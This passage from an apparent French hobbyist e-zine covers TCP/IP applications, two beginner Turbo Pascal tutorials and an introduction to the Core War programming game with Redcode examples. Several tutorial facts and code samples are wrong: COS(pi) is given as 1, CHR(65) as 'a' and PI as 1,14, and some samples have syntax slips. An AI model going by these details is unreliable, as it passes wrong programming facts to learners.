L'user travaille sur l'hote comme si il etait directement devant, en effet les sequences de touches frappees sur sa propre becanne sont envoyees a l'hote, et celui renvoie les reponses au pc du user.
Telnet utilise le TCP/IP comme protocole de communication.
FTP --> Permet le transfert de fichier entre deux machines sur un reseau TCP/IP, quelquesoit la taille des files.
L'utilisateurs se connecte a un serveur FTP grace a son client FTP et peut voyager dans les repertoires de l'hote et lancer des commandes de transfert.
SMTP --> Permet a un utilisateur d'envoyer un message a un autre, les deux etant connectes a un reseau TCP/IP.
C'est le protocole TCP/IP qui est utilisé par un utilisateur pour transmettre son mail a un serveur de messagerie, celui ci s'occupera de le transmettre au destinataire grace a l'adresse electronique de celui ci.
DNS --> Constitue un annuaire electronique permettant de nommer les differentes ressources du reseau. DNS associe un nom symbolique a une adresse IP. (utile quand on surf, et dans les mails)
DNS utilise le protocole UDP/IP comme protocoles de communication.
HTTP --> Permet l'envoi de pages web a un pc equipé d'un navigateur (LynX, Netscape...). Ce navigateur peut lire des fichiers audio, video, textes...
HTTP utilise le TCP/IP comme protocoles de communication.
SNMP --> Permet la gestion a distance de speripheriques comme des hub, des routeurs, des passerelles...
SNMP utilise les protocoles UDP/IP comme protocoles de communication...
VOILA !!!
Vous avez un avant-gout des differentes applications TCP/IP, je les detaillerai d'avantage dans le prochain article qui traitera du developpement d'Internet et comparaison des modeles TCP/IP tres utilisés aujourd'hui que sont les modeles OSi et DoD (les couches...)
--== Ad-Tonnou pour vous servir ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tutorial Turbo Pascal Ad-Tonnou
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
**************************************
** TUTORIAL TURBO PASCAL (Ad-Tonnou)**
**************************************
Salut, c'est ad-tonnou, me revoilou pour un article qui, cette fois, traitera d'un language de programmation qui me tiend à coeur, j'ai nommé le turbo-pascal...
Cet article est le premier d'une longue serie qui traiteront tous de ce sujet, la difficulté allant bien sur en augmentant...
Personnelement, j'utilise TP 6.0 pour compiler et editer tous mes progs, je ne vais pas en expliquer l'utilisation car elle est assez intuitive...
Vu qu'il faut commencer par le debut, on va tout d'abbord commencer par la base: la structure d'un programme...puis on verra un exemple de prog et enfin les differentes types de declarations....
I)LA STRUCTURE D'UN PROG
""""""""""""""""""""""""
TurboPascal comme bien des languages (tous ?) est un language très structuré, la systématique en question fut developpée durant les années 60 par Dijkstra.
a)STRUCTURE GENERALE
°°°°°°°°°°°°°°°°°°°°
Un programme en TurboPascal se compose de 4 parties bien delimitables:
--> L'en-tête (indispensable)
--> L'instruction Uses (pas obligé)
--> La Partie Déclarative (pas obligé)
--> Le corps principal du prog (indispensable)
L'en tête:
Contient seulement le mot réservé 'program' et du nom du prog
L'instruction Uses:
Cette partie contient les noms des unités que le prog utilisera et que le compilateur integrera...(en gros les unités sont les "bibliothèques" dans lesquelle le compilateur ira chercher les signification des mots réservés...heu je sais c'est po tres clair)
La partie declarative:
Cette partie contient la declaration des identificateurs utilisés lors de la suite du prog, par exemple les constantes, les variables...elles doivent imperativement y être présente pour la bonne demarche du prog par la suite.
Le corp principal du prog:
Celui debute par le mot reservé 'Begin' et se termine par le mot 'end.' ( !!!---> le point est partie integrante du mot)
En quelques sortes c'est ici que vous direz au prog ce qu'il doit faire...
b)REMARQUES
°°°°°°°°°°°°
Commentaires:
On peut mettre dans le code source des commentaires, c'est à dire des remarques que le compilateurs ne prendra pas en compte lors de la transcription du code.
Ils sont tres utiles et ils ne faut pas les négliger...notamment utiles lors de la diffusion de votre source pour une meilleure compréhension du prog par d'autres personnes.
Ils figurent entre accolades...
exemple:
{ceci est un commentaire}
Conseils:
L'utilisation de majuscules dans le code permet également une meilleure compréhension..
exemple
'unmotlong' ecrit comme ceci est moins lisible que comme cela 'UnMotLong'
Divers:
Les instructions se terminent toujours par un ';' !!!!
c)EXEMPLE
°°°°°°°°°°
Structure général d'un prog en TurboPascal
(les mots clés sont en majuscules pour plus de lisibilité..
PROGRAM nom du prog {en tête}
USES unit1,unit2....unitn {Uses }
{--------------------------------------------}
{----début le la partie déclarative----------}
CONST
{les constantes}
TYPE
{type de données}
VAR
{variables puis procédures et fonctions (sous-programmes) }
{-----fin de la partie déclarative---------}
{------------------------------------------}
BEGIN {début du corp principal}
{differentes instructions dites 'corporelles'}
END. {fin du corp principal}
d)MOTS CLEFS
°°°°°°°°°°°°°
Ces mots clés ont une signification particuliere,'write'(permet l'affichage) en est un...
Ils appartiennent au vocabulaire de TurboPascal
Les utilisateurs (nous) peuvent créer leurs propres identificateurs (qui peuvent être des variables, des constantes, des procédures...)
Les identificateurs peuvent être aussi longs que vous le voulez, se composer des characteres suivants:les lettres et les chiffres... (chiffres interdits en début d'identificateur, les '.' et ',' sont interdites tout comme les charactères spéciaux...)
CF: IV)
II) L'UNITE CRT
"""""""""""""""
TRES TRES IMPORTANTE est cette unité.
En effet elle permet de gérer les routines suivantes:
Clrscr (efface l'écran), GotoXY (place le curseur aux coordonnées XY), ReadKey (permet de lire un charactere), KeyPressed (attente de l'appui d'un touche) et de plus l'unité CRT permet de gerer la solicitation du clavier....
L'intruction USES s'ecrit alors de la sorte
USES crt;
Le compilateur integrera donc la bibliotheque 'crt'.
III) EXEMPLE SIMPLE
"""""""""""""""""""
Enoncé du problème: 'lire' deux chiffres A et B, les additionner et écrire la somme A+B à l'écran...
On peut d'ores et déja diviser cette tache en plusieurs parties correspondant à des instructions simples:
Effacer l'écran
Lire A puis B
Effectuer la SOMME A+B
Afficher SOMME
QUITTER
Ceci pourrait se traduire par le code suivant...
ETAPE 1:
ClrScr; {efface l'écran}
Readln(A); {lit A à partir du clavier puis va a la ligne,'READ' fait la même chose sans le retour à la ligne}
ReanLn(B);
SOMME := A + B; {on affecte la valeur 'A + B' a l'identificateur 'SOMME' avec le signe :=}
WriteLn(SOMME); {affiche la valeur contenue dans l'identificateur 'SOMME' c'est à dire
READLN; {j'y reviendrai}
ETAPE 2:
Il nous faut rajouter les instruction 'Begin' et 'End.' en début et en fin de corp...le corp du prog est le code de l'etape1
ETAPE 3:
Nous employons ici 3 variables (A,B et SOMME, ce sont des variables car elles dependent de l'utilisateur), il nous faut donc les déclarer dans la section déclarative...(!!! ---> IMPERATIF)
VAR
A,B,SOMME : INTEGER; {j'y reviendrai}
Les variables de mêmes types sont séparées par une virgule, et le type des variables se distingue par
un ':'
cas général:
Var1,Var2 : Type1;
Var3,Var4 : Type2;
ETAPE 4:
Il faut maintenant rajouter l'en-tête: le mot 'program' et le nom du prog) et l' instruction Uses
Ici on utilisera la bibliotheque 'crt' car on utilise la routine 'clrscr'
ETAPE 5:
Nous obtenons finalement ce code:
----------------------------------------
{debut du prog}
Program Addition; {En-tête}
USES Crt; {uses}
Var {partie déclarative}
A,B,SOMME : Integer;
Begin {corp principal du prog}
Clrscr;
Readln(A);
Readln(B);
SOMME:= A + B;
Writeln(SOMME);
Readln;
End.
{fin du prog}
-----------------------------------------
ReadLn --> L'instruction Readln sert à faire attendre le programme l'appui de la touche 'ENTREE'
Ne l'ommetez pas car sinon l'affichage de la somme se fera si rapidement que vous n'aurez rien le temps de voir.
Grace a readln le prog affiche la somme puis attend la touche entrée avant de quitter et de revenir a l'editeur.
L'instruction Write (ou writeln) permet de melanger l'affichage de charactères à l'affichage de variables...et ceci par write('charactere',VAR,'characteres',VAR)
Exemple ---> WriteLn('la somme de ',A,'et de ',B,'est egale à ',SOMME)
en admettant que A=2 et B=4 l'affichage donnera : la somme de 2 et de 4 est de 6.
Ainsi si on essaye de donner un peu plus d'allure a notre programme on pourrait faire ceci...
---------------------------------------------------------------
Program Addition;
Uses CRT;
Var
A,B,SOMME : integer;
Begin
Writeln('Bienvenue dans mon super prog....)
Writeln('veuillez entrer le chiffre A plizzzz...')
read(A);
Writeln('Veuillez entrer le chiffre B plizzzz...');
read(B);
Writeln('La somme de ',A,'et de ',B,' est égale à',SOMME);
Writeln('veuillez appuyer sur entrée pour quitter');
readln;
End.
---------------------------------------------------------------
Ce prog est fourni avec le zip...
Maintenant on va passer à un point très important....
IV)DECLARATION DE CONSTANTES ET DE VARIABLES
""""""""""""""""""""""""""""""""""""""""""""
Maintenant que l'on a vu la structure générale d'un prog en turopascal, on peut passer à la suite...
On va voir plus precisement la partie déclarative d'un prog, et ce qu'elle paut contenir...
TurboPascal possede un mot réservé par type de déclaration: variables,constantes....
La partie déclarative est importante: RIEN NE PEUT ETRE UTILISE DANS UN PROG EN TP SANS QU IL N AIT ETE DECLARE AUPARAVANT...
Cette partie debute par la fin de l'instruction USES et se termine la ou commence le corp du prog (begin)
Deux types de déclarations sont indispensables pour la suite: les variables et les constantes...
a)les constantes
°°°°°°°°°°°°°°°°
Les constantes sont des "données" qui ne varieront en aucun cas lors de l'execution du programme...
La partie déclarative de constantes débute par le mot clé 'CONST'
Suit l'identificateur (le nom de votre choix qui sera affecté de la valeur de votre choix)
puis la valeur afféctée à cet identificateur:
CONST
Identificateur1 = Valeur1;
Identificateur2 = Valeur2;
Par la suite du prog, l'identificateur1 aura donc pour valeur la valeur1.
le code 'write(identificateur1)' donnera donc a l'affichange la valeur 1.
Les valeurs peuvent être des valeurs numériques ou bien des charactères et même des chaines de characteres.
EXEMPLE
aX = 'allianX' {chaine de ch}
PI = 1,14 {valeur numérique}
On apelle 'contenue' la valeure d'une constante...ainsi le contenu de 'aX' est la chaine de chaactere 'allianX'
Choisissez des noms simples et courts pour vos identificateurs, cela simplifie grandement les choz.
Exemple ---> un prog qui se sert du taux de la tva:
Je vais po le faire mais il est bien facile de piger pourquoi il est utile de declarer ce taux en tant que constante des le debut du prog.
Ainsi, vous n'aurez pas a tout modifier en cas de changement de ce taux, mais simplement le debut, la partie declarative de constantes, c'est a dire qu'une seule ligne.
b)Les variables
°°°°°°°°°°°°°°°
Les variables sont des identificateurs auxquels on peut affecter des chiffres, des lettres, des chaines de characteres...
Une variable se definit par 3 elements : Son nom - Son type de donnée - Son contenu
Dans la partie déclarative, une variable recoit son nom, et son type de donnée...
Son contenu ne sera qu'affectée au cours de l'execution du prog..(défini par l'utilisateur)
La partie déclarative d'une variable dbute par le mot reservé 'VAR'..puis le(s) nom(s) de(s) variable(s),
on sépare les noms de variable de mêmes types par une virgule....et on met un ':' entre les(s) nom(s) et le type de donnée.
Exemple:
-----------------------------
VAR
var1,var2 : type1;
var2 : type2;
------------------------------
Ici var1 et var2 ne sont pas encore attibuées d'un contenu...on leur donne juste leur type de donnée.(CF Article2)
Attention a ne pas oublier le ';' car l'attribution d'un type à une variable est un instruction.
Voici la maniere d'affecter une valeur à un contenu:
------------------------------
NomVar:=valeur
------------------------------
le symbole ':=' est le symbole d'affectation d'une valeur à une variable
Exemple:
------------------------------
a := 9;
b :='allianX';
------------------------------
Vous ne pouvez faire cela sans avoir auparavant declarer les variables a et b dans la partie déclarative de variables.
Voila, le premier article est fini.
Forcement c'est lourd mais il faut savoir tout ça pour pouvoir faire des trucs plus sympas...
J'en ai mis deux autres dans le zine pour trois raisons:
Vous avez déjà un bon paquet d'informations à assililer, si vous pigez pas, relisez plusieurs fois; c'est important.
Pour plus de clarté j'ai divisé mon petit premier tutorial en trois articles...
J'en ai ral le cul d'écrire des conneries...je continuerai demain...
--== Ad-Tonnou pour vous servir ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tutorial Turbo Pascal 2 Ad-Tonnou
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
***************************************
** TUTORIAL TURBO PASCAL (Ad-Tonnou) **
***************************************
Nous voila reparti pour un deuxieme article de folie...
Celui-ci sera consacré aux différents types de données en turbo pascal et quelques fonctions de bases appliquables sur
ceux-ci puis des petits trucs simples divers...
Pour lire cet article vous devez avoir pigé le premier
""""""""""""""""""""""""""""""""
" LES TYPES DE DONNEES SIMPLES "
""""""""""""""""""""""""""""""""
En Turbo Pascal, on compte 5 types de données simples:
Les nombres entiers (INTEGER)
Les nombres décimaux (REAL)
Les charactères (CHAR)
Les chaînes de charactères (STRING)
Les valeurs logiques (BOOLEAN)
Les variables, lors de leur déclaration, doivent se voir attribuer d'un des 5 types précedents.
Sur chacun des ces types, on peut effectuer des opérations de comparaison (très utiles):
> (superieur à)
< (inferieur à)
>= (superieur ou égal)
<= (inferieur ou egal)
= (égal à)
<> (différent)
I)Les Nombres Entiers (INTEGER)
"""""""""""""""""""""""""""""""
a)les bases
°°°°°°°°°°°
Domaine de validité des INTEGER:
-32768..........32767
Opérations possibles:
Les comparaisons
L'addtion +
La soustraction -
Multiplication *
La division DIV (résultat entier, pas de décimales)
Le modulo MOD (Le reste de la division)
Exemples:
10+8=18
20-3=17
5*9=45
45 DIV 5=9
45 MOD 5=0
45 DIV 6=7
45 MOD 6=3 (on divise 45 par 6, on a (6*7)+3=45)
Turbo Pascal offre la possibilité d'effectuer quelques procédures standarts sur les differents types de données...pas d'inquietude, vous allez comprendre:
b)Fonctions standarts sur des variables du type INTEGER
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Soit A une variable de type REAl
Soit B une variable de type INTEGER
ABS(B) donne la valeur absolue de la variable B
Le résultat est du type INTEGER
Appel: Result:=ABS(B);
Exemple: Result:=ABS(-5);
La variable 'Result' est alors affecté de la valeur 5.
ROUND(A) donne la valeur arrondie entière de la variable A
Le
résultat est de type INTEGER
Appel: Result:=ROUND(A);
Exemple: Result:=ABS(5.8);
La variable 'Result' est affecté de la valeur 6
SQR(B) donne le quarré de la variable B
Le résultat est de type INTEGER
Appel: Result:=SQR(B);
Exemple: Result:=SQR(3);
La variable 'Result' est affecté de la valeur 9
TRUNC(A) donne la partie entière de la variable A...attention elle n'est pas arrondie!
Le resultat est du type INTEGER
Appel: Result:=TRUNC(A);
Exemple: Result:=TRUNC(5.8);
La variable 'Result' est affecté de la valeur 5
II)LES NOMBRES REELS (REAL)
"""""""""""""""""""""""""""
a)les bases
°°°°°°°°°°°
Domaine de validité:
2.9*10^-39..............1.7*10^38
Déclaration:
---------------------
VAR
exemple : real
---------------------
Opérations possibles:
Les mêmes que pour les INTEGER
La division est possible avec les REAL, / (le résultat est du type REAL)
b)Fonctions standarts sur des variables du type REAL
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Soit A une variable de type real
Soit Result une variable du type du résultat
ABS(A) donne la valeur absolue de la variable A
Le résultat est du type REAL
Appel: Result:=ABS(A);
Exemple: Result:=ABS(-5.8);
Alors la variable Result est affectée de la valeur 5.8
COS(A) donne le cosinus de la variable A...attention le résultat est exprimé en Radian
Le résultat est du type REAL
Appel: Result:=COS(A);
Exemple: Result:=COS(pi);
La variable Result est affectée de la valeur 1.00
SIN(A) donne de la même facon le sinus de la variable A
FRAC(A) donne la valeur décimale de la variable A
Le résultat est du type REAL
Appel: Result:=FRAC(A)
Exemple: Result:=FRAC(5.123456)
La variable Result sera alors affectée de la valeur 0.123456
INT(A) quand à elle donne la partie entière de la variable A...c'est pareil que FRAC
Exemple: Result:=INT(5.123456)
la varible Result sera alors affectée de la valeur 5.
SQR(A) donne le carré de A
Le resultat est du même type que la varible A
Exemple: Result:=SQR(2)
La variable Result sera alorsd affectée de la valeur 4
SQRT(A) donne la racine carré de A
Exemple: Result:=SQRT(4)
La variable Result sera alors affectée de la valeur 2
c)Sortie formatée
°°°°°°°°°°°°°°°°°
Examinons ce code...
------------------------------
Program test1;
Uses
CRT;
VAR
A:REAL;
Begin
Writeln('donnez moi la valeur de A');
Readln(A);
Writeln('affichage normal.....',A);
Writeln('Affichage formaté',A:5:2);
End.
-------------------------------
Admettons que la variable A soit affectée de la valeur 5.123456
Alors l'affichage normale donnera à l'écran: '5.1234560000e+00'...ce qui n'est pas très beau...
Maintenant, l'affichage formaté donera: '5.12'...
A:5:2 signifie que la varible A sera affichéé avec 2 chiffres apres la virgule (!!---> c'est atomatiquement arrondi) et que la variable A sera affichée sur un total de 5 chiffres.
d)Petite appliquation
°°°°°°°°°°°°°°°°°°°°°
------------------------------------------------------
program division;
uses crt;
var
result : real;
rest : real;
A,B : integer;
begin
ClrScr;
writeln('Bienvenue dans mon deuxieme super progz pour allianX');
writeln('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~');
WriteLn('Veuillez me donner le chiffre dont vous voulez voir la division Euclydienne!!!');
readln(A);
WriteLn('Par combien je le divise ??? ');
ReadLn(B);
Result := A DIV B;
Rest := A MOD B;
Writeln('Veuillez appuyer sur Entre afin de continuer');
ReadLn;
Write('Le resultat de la division de ',A,' par ',B,' donne:');
write(Result:4:0);
write(' et le reste est de ');
writeln(rest:4:0); {cf article 2, "affichage format"}
write('Appuyez sur Entree pour quitter...');
ReadLn;
End.
---------------------------------------------------------
J'espère que vous comprenez car là je passe à la suite...surtout que c'est vraiment bidon.
III)Les charactères (CHAR)
""""""""""""""""""""""""""
Ce type de données s'applique à tous les charactères du code ASCII (American Standart Code for Information Interchange).
Ce code comprend tous les charactères de votre clavier plus tous les charactères graphique...
Tous ces charactères sont représentés par un chiffre...compris entre 0 et 255 inclus.
a)Les bases
°°°°°°°°°°°
On peut affecter un charactère à une constante:
--------------------------
CONST
A = 'a'; {la variable A est affectée du charactère 'a'}
----------------------------
Déclaration du type char
------------------
VAR
ch:char; {alors la variable de nom 'ch' sera affecté du type 'char'}
------------------
Ce code est contenu dans la partie déclarative du progz...il permettra donc par exemple d'affecter par la suite une valeur à la variable ch...cette valeur étant bien entendu de type 'char'
--------------------
ch:='y'; {alors la variable 'ch' est affectée de la valeur 'y'}
ch:='chaine'; {cela ne marchera pas car 'chaine n'est pas un charactère mais une chaine de charactères}
--------------------
Les opérations possible sont les opérations de comparaison...on les a déjà vues au-dessus...
b)Les fonctions standarts possibles sur les variables de type 'CHAR'
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Soit 'ch' une variable du type char...
I est une variable de type INTEGER....
La variable 'result' est du type du resultat
CHR(I) retourne le charactere dont le code ascii/ibm est de I
Appel: RESULT:=CHR(I);
Exemple: RESULT:=CHR(65);
La variable 'RESULT' est alors afféctée de la valeur 'a'
ORD(CH) retourne le code du charactere 'CH'
Appel: RESULT:=ORD(CH);
Exemple: RESULT:=ORD('A');
La variable 'RESULT' sera alors affecté de la valeur 65
PRED(CH) donne le predecesseur de la variable CH
Appel: RESULT:=PRED(CH);
Exemple: RESULT:=PRED('b');
La variable result sera alors affectée de la valeur 'a'
SUCC(CH) c'est comme PRED5CH° sauf qu'il donne le successeur
IV)Les chaines de characteres (STRING)
""""""""""""""""""""""""""""""""""""""
a)les bases
°°°°°°°°°°°
C'est le regroupement de charactères de longueur maximale de 255 charactères...
Le type s'apelle STRING
Déclaration de variables de type STRING (dans la partie déclarative bien sur)
------------------------------
var
st:string;
------------------------------
On peut limiter la longueur maximale d'une chaine...en indiquant une valeur entiere a la suite du mot réservé STRING
------------------------------
var
st:string[10];
------------------------------
Déclarations de constantes en tant que textes:
------------------------------
Const
ax:='allianX';
ad:='ad-toto';
------------------------------
(notez les '', et le signe d'affectation ':=')
On peut aussi acceder à un seul charactere dans une string...
------------------------------
ax:='allianX';
write(ax[7]);
------------------------------
L'affichage donnera alors à l'écran 'X'. (le 7ème charactere de la string 'allainX'.)
Les opérations possibles sur des string sont les comparaisons et les concaténations...
Exemple de prog mettant bout à bout (c'est ça la concatenation) deux strings
------------------------------
Program concatene;
var
st1,st2:string;
st3:string;
begin
clrscr;
st1:='team';
st2:='allianX';
writeln('voici la 1ere chaine',st1);
writeln('voici la 2eme chaine',st2);
st3:=st2 + st1;
writeln('voici leur concatenation',st3);
readln;
end.
------------------------------
b)fonctions standarts sur les strings
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
CONCAT(ST,ST1) met bout a bout plusieurs chaines (ici st et st1)
appel: concat(st,st1...);
exemple: st:='turbo';
st1:='pascal';
result:=concat(st,st1);
La variable 'result' sera alors affecte de la valeur (de type string) 'turbo pascal'
COPY(ST,I,J) copie une partie de longueur J de la chaine ST a partir de la position I
appel: concat(st,i,j);
exemple: st:=ad-tonnou;
result:=copy(st,4,6);
Le resultat sera alors affecte de la valeur 'tonnou'
DELETE(ST,I,J) efface J characteres a partir de I dans la chaine ST.
appel: delete(st,i,j);
exemple: st:='ad-tonnou';
delete(st,4,6);
write(st)
L'affichage donnera alors 'ad-' (puisque 'tonnou' s'est fait deleté)
INSERT(st,st1,I) insere la chaine st dans la chaine st1 a partir de la position I
Appel: INSERT(st,st1,I);
exemple: insert('-t','adonnou',2);
write(st1); retournera alors la chaine 'ad-tonnou'
LENGTH(ST) retourne la longueur de la variable ST.
exemple: result:=length('ad-tonnou');
La variable 'RESULT' sera alors affectée de la valeur 9. (result doit etre declare en tant que integer)
Voila en gros les bases sur les strings....voyons maintenant le type 'boolean'.
V)Les valeurs logiques (boolean)
""""""""""""""""""""""""""""""""
a)les bases
°°°°°°°°°°°
Une variable de type Boolean ne peut recevoir que 2 valeurs: true (vrai) ou false (faux)
Une opération du type a>b retourne le resultat
true si a>b
false si a=<b
(NB --> > est l'operateur et A et B sont les operandes)
Syntaxe de déclaration d'une variable de type BOOLEAN
---------------------------
var
test:boolean;
---------------------------
Les operations possibles sur les BOOLEANS:
--> les operations de comparaison (seulement quand false<true)
--> A and B (et logique)
--> A or B (ou logique)
--> A XOR B (ou exclusif)
--> NOT A (nona, negation de A)
Une seule fonction standart:
ODD(I) retourne true quand I est impair (I est ici integer)
exemple: result:=ODD(16)...
La variable 'result' est alors affectee de la valeur 'false' car 16 est paire.
VOILA !! Vous savez les bases (de bonnes bases) à propos des differents types de donnees de TurboPascal.
Je vais eclaircir quelques points qui je pense sont importants....
VI)Les instructions d'entree READ/READLN
""""""""""""""""""""""""""""""""""""""""
Ces commandes permettent de transmettre des valeurs a un programme par l'intermediaire du clavier.
-----------------------
READLN(X)
-----------------------
Cette commande attend de l'utilisateurs l'entree d'une valeur au clavier (depend du type de X).
Si X est du type 'CHAR' et que vous entrez la valeur '5', cela vous conduira systematiquement a une erreur (il faudra penser par exemple a integrer des routines interceptant les messages d'erreurs...ce sera pour plus tard)
Dans les exemples precedants, j'avais mis readln a la fin du code afin d'arreter le prog jusqu'a l'appui sur 'entree'.
Exemple tout con general
----------------------
write('quel est ton nom ???');
readln(nom);
----------------------
L'utilisateur comprendra qu'il doit indiquer son nom...
(L'instruction read est utile pour lire des trucs a partir d'autres files mais la on parle de solicitation des users, donc on reste a readln....)
Exemple encore tout con de l'utilisation simple de 'WRITE' et de 'READLN'...
------------------------------------------------------
program con;
uses crt;
var
prenom:string[15]; {le prenom, pas plus que 15 characteres}
age:integer; {l'age}
chiffre1,chiffre2,chiffre3:integer;
begin
write('c koa ton nom ??');
readln(Prenom);
write(prenom,'c koa ton age ???');
readln(age);
write('indic moi 2 chiffres ! ');
readln(chiffre1);readln(chiffre2);
chiffre3:=chiffre1+chiffre2;
writeln(prenom,'tu as ',age,' ans et la somme entre',chiffre1,' et ',chiffre2,' est ',chiffre3);
write('appuis sur entree pour sortir');
readln;
end.
------------------------------------------
VII)La commande 'READKEY'
"""""""""""""""""""""""""
Certains progs necessitent l'appui d'une touche sur le clavier mais sans pour autant que celle ci s'affiche (sans echo)
L'appel est de cette forme:
-------------------------------
ch:=readkey;
-------------------------------
(la variable ch doit etre declaree auparavant en tant que charactere)
La touche pressee est enregistree en tant que valeur de 'CH' mais n'est pas affichee pour autant.
exemple con:
----------------------------------
progam readkey
uses crt;
var
ch:char;
begin
clrscr
writeln('appuyez sur une touche');
ch:=readkey; {ch est alors affectee de la valeur 'lettre lu' mais rien ne s'affiche}
writeln('touche lue:'ch);
readln;
end.
VOILA !!!!
C'est fini, le prochain episode traitera des boucles et de la programmation en TP orientée decisions...
--== Ad-Tonnou pour vous servir ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le Core War Tun!Z2000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CCCCCCC OOOOOOO RRRRRR EEEEEEE
C O O R R E
C O O R R E
C O O RRRRRR EEEEE
C O O R R E
C O O R R E
CCCCCCC OOOOOOO R R EEEEEEE
W W W W A RRRRRR
W W W W AA R R
W W W W A A R R
W WW W A A RRRRRR
W WW W AAAAA R R
WW WW A A R R
W W A A R R
______________________________
[Auteur: Tun!Z 2000 |
[Contact: Tuniz2000@yahoo.com|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction : Au début de l'ère des microordinateurs, un etudiant riquain trouva intelligent de faire un programme qui se duplique dans la mémoire du système sur lequel il tourne, sans rien faire d'autre, ce n'était pas un virus. Et puis un autre étudiant est venu avec un autre programme qui lui ne servait qu'a détruire le processus du premier programme. A la fin, le deuxieme avait gagné. Ces deux étudiants auraient inventé le CoreWar. Auraient, parceque cette histoire n'est pas officielle, une légende quoi, comme l'histoire de la pomme de Newton qui aurait été inventée par Newton pour expliciter sa théorie. Bon le but du CoreWar est de créer un soldat qui serait plus fort que celui de l'adversaire. C'est des soldats-robots qui remplsissent la memoire systeme, pas des soldats avec graphisme 3D polygonal au moteur Voxel etc, etc... Les premiers CoreWarriors écrivaient leur soldats en assembleur donc il s'agit en fait d'execution d'instruction. Seuleument, utiliser la vraie mémoire système entrainait des problemes sur l'odrinateur Hôte. Alors des types ont eu l'idée de synthétiser une arène virtuelle représentée par une grille qui représente une émulation d'un microprocesseur et de sa mémoire, et on créé un nouveau langage, moins complet mais plus simple que l'assembleur, le RedCode.
Le RedCode
Malgré quelques ajouts de certains programmeurs, le RedCode officiel est constitué des fonctions suivantes :
* DAT argument
Il s'agit d'une instruction non executable. Si un soldat tente de l'executer, il a perdu. Si une case memoire comporte l'instruction DAT argument, alors toute réference à cette case est référée à l'argument, qui peut etre une variable par exemple.
* MOV argument1 argument2
Cette instruction recopie le contenu de la case memoire argument1 ou le nombre argument1 sur la case memoire argument2.
* JMP argument
Cela permet de sauter directement à la case memoire argument.
* JMZ argument1 argument2
Si on a argument2 ou le contenu de la case argument2 nul, alors on saute à la case argument1.
* JMG argument1 argument2
Si on a argument2 ou le contenu de la case argument2 positif, alors on saute à la case argument1.
* ADD argument1 argument2
Ajoute la valeur de argument1 ou de la case argument1 à la valeur de argument2 ou de la case argument2.
* SUB argument1 argument2
L'inverse: on soustrait la valeur de argument1 ou de la case argument1 à la valeur de argument2 ou de la case argument2.
* DJZ argument1 argument2
Enlève 1 à la valeur de argument2 ou de la case argument2, et saute à la case argument1 si le nouvel argument2 est nul.
* CMP argument1 argument2
Compare les valeurs des deux arguments ou de leurs cases memoire respectives, et saute l'instruction qui suit s'ils sont differents.
Certains programmeurs ajoutent à cela des fonctions comme Fork ou Kill, pour se dupliquer ou tuer un processus, mais ces commandes ne sont pas officielles.
L'argument se compose d'un indice d'adressage et d'un nombre:
#X signifie la valeur X, et pas la case memoire (adressage immediat)
X sans aucun symbole signifie X cases memoires avant ou apres celle ou se situe l'instruction (adressage relatif)
@X signifie la valeur de l'argument de la Xième case avant ou après celle-ci, cette case doit forcemment contenir une instruction de type DAT (adressage relatif indirect)
Un soldat se charge dans la pseudo-mémoire. Il éxécute son instruction, puis saute à la case d'après (sauf si l'instruction est un saut, dans ce cas il ne va pas à la case suivante mais à la case indiquée par le saut). Là ilattend un moment que le profgrammme adverse execute un instruction puis il execute lui aussi un instruction, et ainsi a tour de rôle jusqu'à la mort de l'un des deux. Pour tuer l'adversaire, il faut le balancer sur un DAT pour qu'il perde la partie au moment de jouer. Ce n'est pas simple car les soldats balayent tout sur leur passage avant de s'installer.
Je sais ca parait un peu abstrait mais je vais expliquer par l'exemple. Commencez par telecharger un emulateur de CoreWar, personnellement j'aime bien l'environnement de developpement CoreWar de Michel Casabianca, parcequ'il est en Java, donc ca marche partout, mais il y en a d'autres.
Voici le programme soldat le plus simple: le rouleau compresseur ou IMP. Code source:
MOV 0 1
Le programme se lance. Il execute son instruction qui est de copier le contenu de la case actuelle (c'est à dire MOV 0 1 ) sur la suivante puis passe à la suivante, où il éxécutera la même instruction puis encore la case suivante, où il réexecutera la meme chose etc etc...
Le rouleau compresseur fais donc le menage sur la case suivante, laisse son adversaire jouer, ppuis passe à la case suivante et fait le menage sur la case qui suit, ...
Ce programme quoique simple est très efficace pour s'entrainer à la preogrammation. Un exercice est la programmation d'un soldat anti IMP
Exemple de solution (très connue donc pas de moi): Le RADAR. Code source :
***PHASE 1***
mov #1 -100
add #19 14
mov #0 @13
cmp #1 -103
jmp -3
***PHASE 2***
mov @11 @12
cmp #1 10
jmp 4
add #1 8
add #1 8
jmp -5
mov #-16 -129
mov #-16 -129
mov #-150 -129
JMP -147
dat -16
dat -16
dat -150
